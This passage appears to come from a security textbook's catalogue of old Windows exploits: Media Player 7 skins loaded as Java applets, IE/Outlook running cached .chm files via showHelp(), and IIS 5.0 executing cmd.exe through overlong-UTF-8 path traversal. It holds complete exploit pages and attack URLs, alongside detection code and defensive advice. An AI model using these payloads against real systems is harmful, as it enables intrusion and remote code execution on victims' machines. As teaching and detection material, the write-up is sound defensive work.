There is a security vulnerability in the Windows Media Player 7 application that is exploitable through IE and Java. This exploit enables someone to read local files and browse local directories as well as execute arbitrary programs. This could lead to a remote user taking full control over the victim’s computer.
Exploit Details
• Name: Media Player 7 and IE Java vulnerability
• Operating System: Windows 95, 98, 98se, 2000, NT
• Protocols/Services: IE Java, Windows Media Player 7
How the Exploit Works
Windows Media Player skins are installed in a commonly known directory with a commonly known name: "C:/Program files/Windows Media Player/Skins/SKIN.WMZ".
The tag <IFRAME SRC="wmp2.wmz"></IFRAME> makes IE download wmp2.wmz and place it in "C:/Program files/Windows Media Player/Skins/wmp2.wmz".
If wmp2.wmz is a Java JAR archive and a page contains the following applet tag,
---
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
---
it will be executed with CODEBASE=file://c:/, and the applet will have read-only access to C:\.
How to Use the Exploit
Any HTML editor can be used to make the hostile web site. Create a page with the given code. When a user visits that page, the vulnerability is exploited.
Signature of the Attack
A sign of this exploit is programs starting that the user did not intentionally launch.
How to Protect Against It
The best way to prevent this attack is to disable Java, which is not always possible. As with many of these new exploits, there is not a lot that can be done beyond making sure all your systems and networking components implement the principle of least privilege and that you have defense-in-depth mechanisms in place protecting your corporate assets.
Source Code/Pseudo Code
The following is the source code that an attacker would put on a hostile web page and wait for a victim to connect:
---wmp7-3.html---
<!-- hidden frame: IE saves wmp2.wmz into the known Skins directory -->
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f() {
  window.open("wmp7-3a.html");
}
setTimeout("f()", 4000); // give the download time to finish before opening the applet page
</SCRIPT>
---
---wmp7-3a.html---
<!-- the applet is loaded from the local archive with a file: codebase -->
<APPLET CODEBASE="file://c:/"
        ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
        CODE="gjavacodebase.class"
        WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
---
Additional Information
The following URL is where the source code and additional information can be found: http://www.net-security.org/text/bugs/979586134,83134,.shtml
IE 5.x/Outlook Allows Executing Arbitrary Programs
There is a security vulnerability in IE 5.x/Outlook/Outlook Express which allows the execution of arbitrary programs using .chm files. The exploit also reveals the location of the temporary Internet files folder on the victim’s machine. This can lead to an attacker taking full control over the victim’s computer.
Exploit Details
• Name: IE 5.x/Outlook allows executing arbitrary programs using .chm files and the temporary Internet file folder.
• Operating System: Windows 95, 98, 98se, NT, 2000
• Protocols/Services: IE 5.x/Outlook/Outlook Express
How the Exploit Works
<OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 HEIGHT=200> may reveal one of the temporary Internet files folders through the embedded document's URL (where SOMEHOST.COM is a web server or alias different from the web server from which the HTML page is loaded). Once a temporary Internet files folder name is known, it is possible to cache a .chm file in any temporary Internet files folder and then use window.showHelp() to execute it.
Signature of the Attack
The only way to tell that this exploit has been used is that applications start without the user launching them.
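As an added example (not code from the advisory or its author), a content-inspection check that a proxy or mail gateway could run over incoming HTML to flag the markers of this exploit and of the Media Player 7 one above; the host names intranet.example and other.example are placeholders.

```python
# Added example (not from the advisory): flag HTML that carries the markers of
# the two IE exploits described above. Host names used here are placeholders.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

class IEExploitInspector(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()  # host the page itself was served from
        self.findings = []
        self.script = None                  # buffer for the current <script> body

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names already lower-cased by HTMLParser
        if tag == "iframe" and a.get("src", "").lower().endswith(".wmz"):
            self.findings.append("iframe fetches a .wmz skin: " + a["src"])
        if tag == "applet" and a.get("codebase", "").lower().startswith("file:"):
            self.findings.append("applet with local CODEBASE: " + a["codebase"])
        if tag == "object" and a.get("type", "").lower() == "text/html":
            host = (urlsplit(a.get("data", "")).hostname or "").lower()
            if host and host != self.page_host:  # the cross-host load that leaks the cache path
                self.findings.append("cross-host HTML object: " + a["data"])
        if tag == "script":
            self.script = ""

    def handle_data(self, data):
        if self.script is not None:
            self.script += data

    def handle_endtag(self, tag):
        if tag == "script" and self.script is not None:
            if re.search(r"\.showHelp\s*\(", self.script) and "document.URL" in self.script:
                self.findings.append("script derives a local path from document.URL for showHelp()")
            self.script = None

def inspect_html(html, page_host):
    p = IEExploitInspector(page_host)
    p.feed(html)
    p.close()
    return p.findings  # list of human-readable findings, empty when nothing matched

# Constructed sample: the skeleton of the pages shown in this write-up, with
# intranet.example serving the page and other.example as the second alias.
SAMPLE = """<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
 CODE="gjavacodebase.class"><PARAM NAME="URL" VALUE="file:///c:/test.txt"></APPLET>
<OBJECT DATA="http://other.example/chmtemp.html" TYPE="text/html"></OBJECT>
<SCRIPT>path=document.URL; window.showHelp(path+"\\\\chm1[1].chm");</SCRIPT>
<OBJECT DATA="http://intranet.example/help.html" TYPE="text/html"></OBJECT>"""
```

Run against SAMPLE with page_host "intranet.example" the inspector reports four findings and ignores the same-host OBJECT.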
How to Protect Against It
This kind of attack can be avoided by setting the IE security level on your machine to High.
Source Code/Pseudo Code
The following is the source code for running this exploit:
---chmtempmain.html---
<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1>
<BR>
The object below must be loaded from a server with name different from the parent
document - it may be the same server but use the IP address or another alias.
<BR>
If this does not work try increasing the number of "chm*.chm"
in IMG and showHelp.
<BR>
<OBJECT DATA="http://guninski.com/chmtemp.html"
        TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
---
---chmtemp.html---
<SCRIPT>
function g() {
  // document.URL of the cached copy gives away the temporary Internet files folder
  s = document.URL;
  path = s.substr(0, s.lastIndexOf("\\"));
  path = unescape(path);
  alert("One of your temp files directory is: " + path);
  window.showHelp(path + "\\chm1[1].chm");
  window.showHelp(path + "\\chm2[1].chm");
  window.showHelp(path + "\\chm3[1].chm");
  window.showHelp(path + "\\chm4[1].chm");
  window.showHelp(path + "\\chm5[1].chm");
  window.showHelp(path + "\\chm6[1].chm");
  window.showHelp(path + "\\chm7[1].chm");
  window.showHelp(path + "\\chm8[1].chm");
  window.showHelp(path + "\\chm9[1].chm");
  window.showHelp(path + "\\chm10[1].chm");
}
setTimeout("g()", 5000); // if you are on a slow Internet connection you must increase the delay
</SCRIPT>
---
Additional Information
Source code and additional information can be found at http://www.guninski.com/
IIS 5.0 Allows Executing Arbitrary Commands on the Web Server
If patch Q277873 is installed on IIS 5.0, then a remote attacker can execute arbitrary programs on the web server.
Exploit Details
• Name: IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server
• Operating System: Any Microsoft Server Platform with IIS 5.0 and patch Q277873
• Protocols/Services: IIS 5.0
How the Exploit Works
When IIS receives a valid request for an executable file, it passes the name of the requested file to the Windows operating system for processing. It is possible for an attacker to create a malformed file request that contains both a file name and one or more operating system commands. When the system receives this request, IIS passes the entire string to the operating system, which then processes the file and executes the commands.
How to Use the Exploit
The only things needed to run the exploit are an Internet browser and the given script.
Signature of the Attack
The only way to tell if someone is using this exploit on a given system is to watch the event logs and look for unusual hard drive and application activity. Until the vendor releases a patch, knowing thy system is therefore a key principle of network security.
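As an added example (not from the advisory), a detector for the request pattern this section describes, run over constructed IIS W3C-format log lines: it percent-decodes the URI stem, accepts the two-byte overlong UTF-8 forms that IIS 5.0 accepted, and flags stems whose ".." segments climb above the web root or that end in cmd.exe. Log field order and the sample lines are assumptions made for the demo.

```python
# Added example (not from the advisory): flag IIS 5.0 requests that hide '..' behind overlong UTF-8.
import re
from urllib.parse import unquote_to_bytes

def decode_overlong(uri):
    """Percent-decode, then accept two-byte overlong UTF-8 as IIS 5.0 did
    (lead byte C0/C1 can only encode ASCII: %C0%AF is '/', %C1%9C is '\\')."""
    raw = unquote_to_bytes(uri)
    out, saw, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            saw, i = True, i + 2
        else:
            out.append(chr(b))  # other bytes kept as latin-1, good enough for matching
            i += 1
    return "".join(out), saw    # (decoded text, overlong sequence seen?)

def escapes_root(path):
    """True when '..' segments (/ or \\) climb above the URL root; legitimate requests never do."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        depth += -1 if seg == ".." else (seg not in ("", "."))  # a bool counts as 0 or 1
        if depth < 0:
            return True
    return False

def classify(uri_stem):
    """Names of the checks a request stem trips; an empty list means nothing found."""
    decoded, overlong = decode_overlong(uri_stem)
    checks = [("overlong-utf8", overlong), ("traversal", escapes_root(decoded)),
              ("cmd.exe", re.search(r"[\\/]cmd\.exe$", decoded, re.I))]
    return [name for name, hit in checks if hit]

def scan_log(text):
    """Fields per W3C log line (assumed): date time c-ip method uri-stem uri-query status."""
    alerts = []
    for line in text.splitlines():
        f = line.split()
        reasons = classify(f[4]) if len(f) >= 5 else []
        if reasons:
            alerts.append((f[2], f[4], reasons))
    return alerts

# Constructed sample lines; the first two mirror the request shapes quoted in this section.
SAMPLE_LOG = """2001-01-15 10:02:11 10.0.0.7 GET /scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe /c%20dir%20C:\\ 200
2001-01-15 10:02:15 10.0.0.7 GET /scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctest.txt - 200
2001-01-15 10:03:01 10.0.0.9 GET /index.html - 200"""
```

scan_log(SAMPLE_LOG) returns two alerts, the first tagged overlong-utf8, traversal and cmd.exe, the second overlong-utf8 and traversal; a plain request produces none.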
How to Protect Against It
Uninstall the Q277873 patch until Microsoft releases a fix. This is a case where a patch fixes one problem but creates another. This is why it is so important to test any patch before applying it to a production system.
Source Code/Pseudo Code
The following are the URLs an attacker would request to extract information:
http://SOMEHOST/scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
This executes "DIR C:\"; when the system prompts, the output can be saved to a file. Extending this idea, an attacker can read most files by requesting:
http://SOMEHOST/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctest.txt
Additional Information
Additional information and the source code can be found at:
http://www.guninski.com/iisasp.html
Microsoft WINS Domain Controller Spoofing Vulnerability